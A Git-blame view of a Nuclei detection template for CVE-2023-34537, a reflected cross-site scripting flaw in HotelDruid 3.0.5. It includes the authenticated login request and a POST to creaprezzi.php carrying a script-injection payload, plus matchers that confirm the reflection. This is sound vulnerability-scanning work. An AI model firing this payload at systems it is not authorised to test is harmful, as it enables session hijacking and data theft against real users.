daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-34537.yaml

56 lines
2.5 KiB
YAML
Raw Normal View History

Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
id: CVE-2023-34537
info:
updated req,matchers
2023-06-30 11:26:36 +00:00
name: Hoteldruid 3.0.5 - Cross-Site Scripting
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
author: Harsh
severity: medium
description: |
A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
reference:
- https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5
- https://nvd.nist.gov/vuln/detail/CVE-2023-34537
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-34537
cwe-id: CWE-79
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
epss-score: 0.0007
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot:
2024-01-14 13:49:27 +00:00
epss-percentile: 0.28902
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
metadata:
misc update
2023-06-24 14:35:55 +00:00
verified: true
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
max-request: 2
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: digitaldruid
product: hoteldruid
tags enhancements
2023-12-05 09:50:33 +00:00
tags: cve,cve2023,hoteldrui,xss,authenticated,digitaldruid
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
http:
- raw:
- |
updated req,matchers
2023-06-30 11:26:36 +00:00
POST /inizio.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
vers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}
- |
POST /creaprezzi.php HTTP/1.1
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
misc update
2023-06-24 14:35:55 +00:00
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
anno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1
updated req,matchers
2023-06-30 11:26:36 +00:00
skip-variables-check: true
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
redirects: true
matchers:
- type: dsl
dsl:
updated req,matchers
2023-06-30 11:26:36 +00:00
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "HotelDruid")'
Create CVE-2023-34537.yaml
2023-06-24 14:16:18 +00:00
condition: and
Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot:
2024-01-14 14:05:19 +00:00
# digest: 4a0a0047304502207eb954960f45ba8a537a4f9df8d0ae20b9df94f5d2a1f23b75dbd7babfe38c490221008770b31570bf350e2c6298274ccda38ba8bbcd38e3c26e2088705be94f5dd629:922c64590222798bb761d5b6d8e72950